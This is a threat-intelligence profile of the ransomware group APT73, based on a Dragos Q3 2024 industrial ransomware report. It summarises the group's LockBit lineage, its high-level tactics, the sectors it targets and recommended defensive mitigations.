Full Report
A Dragos report observed 23 new ransomware groups targeting industrial organizations in Q3 2024
Analysis Summary
# Threat Actor: APT73
## Attribution & Identity
* **Identification:** APT73
* **Aliases/Associations:** Linked to remnants of LockBit affiliates due to repurposing of LockBit operational techniques.
## Activity Summary
APT73 was identified in the Dragos *Industrial Ransomware Analysis: Q3 2024* report as one of the 23 ransomware groups impacting industrial organizations. In Q3 2024, the group was noted for introducing new payloads designed to evade detection and maintain its foothold in targeted environments.
## Tactics, Techniques & Procedures
- Repurposing of LockBit operational techniques.
- Introduction of new payloads to evade detection.
- **Living-off-the-land:** Mimicking legitimate network activity using tools like PowerShell, certutil.exe, and PsExec.
- **Abusing remote access tools:** Increased use of AnyDesk and Quick Assist alongside custom scripts to disable antivirus protection.
- **Targeting virtual environments:** While not specifically attributed as the primary focus for APT73 in this excerpt, related groups targeted VMware ESXi.
- **Combined attacks:** Attacking groups generally combined vulnerability exploitation with credential-based attacks to bypass MFA protections.
- **VPN Exploitation:** Increasing trend of exploiting VPN vulnerabilities for initial access.
## Targeting
* **Sectors:** Industries with a low tolerance for downtime, including healthcare, financial services, and industrial operations (sectors where operational disruption leads to cascading impacts).
* **Geography:** Not explicitly detailed for APT73, but context implies global targeting based on impacted industrial sectors.
* **Victims:** Specific victims for APT73 were not named in the description.
## Tools & Infrastructure
* **Malware families used:** New, unspecified payloads introduced by the group for system evasion.
* **Infrastructure:** Not explicitly detailed.
## Implications
APT73 represents a persistent threat originating from established ransomware lineages (LockBit remnants), demonstrating evolution by developing custom evasion techniques (new payloads). Their activity underscores the continued risk to critical infrastructure and highly sensitive sectors where downtime directly translates to significant impact or perceived likelihood of ransom payment.
## Mitigations
- Monitor for and investigate the use of custom, novel payloads designed for evasion.
- Implement robust monitoring for the use of legitimate administrative tools (PowerShell, PsExec) for potentially malicious command execution (Living-off-the-land defense).
- Review and limit the use and configuration of remote access tools like AnyDesk and Quick Assist, ensuring they are tightly controlled and monitored for script execution aimed at disabling security controls.